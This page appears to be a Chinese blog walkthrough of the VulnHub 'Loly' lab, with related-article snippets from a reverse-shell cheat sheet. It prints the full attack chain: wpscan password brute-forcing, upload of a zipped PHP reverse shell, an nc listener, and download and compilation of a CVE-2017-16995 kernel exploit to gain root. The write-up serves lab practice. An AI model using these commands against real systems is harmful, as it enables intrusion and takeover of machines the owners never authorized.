<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Loly的實踐

    VSole2023-01-16 10:38:46

    今天實踐的是vulnhub的Loly鏡像,

    下載地址,https://download.vulnhub.com/loly/Loly.ova,

    用workstation導入,做地址掃描,sudo netdiscover -r 192.168.58.0/24,

    176就是靶機,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.176,

    有http服務,做一下目錄暴破,dirb http://192.168.58.176,

    瀏覽器訪問http://192.168.58.176/wordpress,進一步點擊登錄,發現需要用域名,

    本地添加上域名靜態記錄,192.168.58.176 loly.lc,再次訪問,需要用戶名密碼,

    用kali攻擊機做用戶名掃描,

    wpscan --url http://loly.lc/wordpress --enumerate u,發現用戶loly,

    繼續用kali攻擊機做密碼暴破,

    wpscan --url http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt,得到密碼,fernando,

    用戶名密碼登錄,發現一處可以上傳文件的入口,提示不能直接上傳php文件,可以上傳zip,會自動解壓,

    直接用kali攻擊機上自帶的web shell文件,

    cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php,

    改一下反彈的地址和端口,再壓縮成zip,zip shell.zip shell.php,

    從kali攻擊機的瀏覽器上傳,

    kali攻擊機上開個反彈shell監聽,nc -lvp 4444,

    瀏覽器訪問http://loly.lc/wordpress/wp-content/banners/shell.php,

    獲取到反彈shell,不是root,需要提權,

    查看系統信息,跟上期需要提權的情況一樣,

    還是本地創建一個ubuntu16.04.1的虛機,

    下載poc源碼,wget https://www.exploit-db.com/download/45010,

    編譯,mv 45010 cve-2017-16995.c,gcc cve-2017-16995.c -o poc,

    把編譯好的poc文件搞到靶機上,執行,chmod +x poc,./poc,

    獲取到新的shell,id確認是root,

    shellloly
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    vulnhub之Loly的實踐
    2023-01-16 10:38:46
    今天實踐的是vulnhub的Loly鏡像,下載地址,https://download.vulnhub.com
    OneEDR 2.5版本讓惡意Webshell“現原形”
    shell編程15例(三)
    2022-03-25 07:43:19
    1、統計當前 Linux 系統中可以登錄計算機的賬戶有多少個 #!/bin/bash # 統計當前 Linux 系統中可以登錄計算機的賬戶有多少個 #方法 1: grep "bash$" /etc/passwd | wc -l #方法 2: awk -f: '/bash$/{x++}end{print x}' /etc/passwd
    shell編程15例(一)
    2022-03-23 07:53:04
    1、編寫hello world腳本 #!/bin/bash # 編寫hello world腳本 echo "Hello World!" 2、通過位置變量創建 Linux 系統賬戶及密碼 #!/bin/bash # 通過位置變量創建 Linux 系統賬戶及密碼
    Electron_shell是一款功能強大且隱蔽性極強的遠程訪問紅隊工具,該工具基于JavaScript語言開發,專為紅隊研究人員設計,可以利用Electron的功能來實現命令注入,并實現了其他的遠程控制方法。
    反彈Shell大全與原理
    2023-04-25 10:15:00
    reverse shell與telnet,ssh等標準shell對應,本質上是網絡概念的客戶端與服務端的角色反轉。對方主機在局域網內,從外網無法直接訪問。對方主機上存在WAF,對主動連接發來的請求數據檢測嚴格,而對向外發出的請求不進行檢測或檢測較少。對方由于防火墻等限制,對方機器只能發送請求,不能接收請求。在滲透測試過程中,得到webshell后一般我們會反彈shell。反彈shell原理A主機開啟9090端口的tcp服務
    在我們滲透測試的過程中,最常用的就是基于tcp/udp協議反彈一個shell,也就是反向連接。我們先來講一下什么是正向連接和反向連接。centos執行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 這個payload是反向連接并且只支持Linux,Windows可以參考離別歌師傅的python windows正向連接后門。這樣會把目標機的/bin/bash反彈給攻擊機但是很多Linux的nc很多都是閹割版的,如果目標機器沒有nc或者沒有-e選項的話,不建議使用nc的方式.PHP攻擊機監聽nc -lvvp 4444. 要求目標機器有php然后執行php -r '$sock=fsockopen;exec;'. 加載64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    這里你可以理解為 a = 1,同時還可以 a =2、a = 3 ,不同的值都可以復制給同一個 變量 a 。Shell常見的變量之一系統變量,主要是用于對參數判斷和命令返回值判斷時使用,系統變量詳解如下:。令或程序執行完后的狀態,返回0表示執行成功;顯示當前主機名;
    自己的小網站跑在阿里云的 ECS 上面, 偶爾也去分析分析自己網站服務器日志,看看網站的訪問量。看看有沒有黑闊搞破壞!于是收集,整理一些服務器日志分析命令,大家可以試試!配合sort進一步排序。uniq -c 相當于分組統計并把統計數放在最前面cat?
    自己的小網站跑在阿里云的 ECS 上面, 偶爾也去分析分析自己網站服務器日志,看看網站的訪問量。看看有沒有黑客搞破壞!于是收集,整理一些服務器日志分析命令,大家可以試試!配合sort進一步排序。uniq -c 相當于分組統計并把統計數放在最前面cat?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类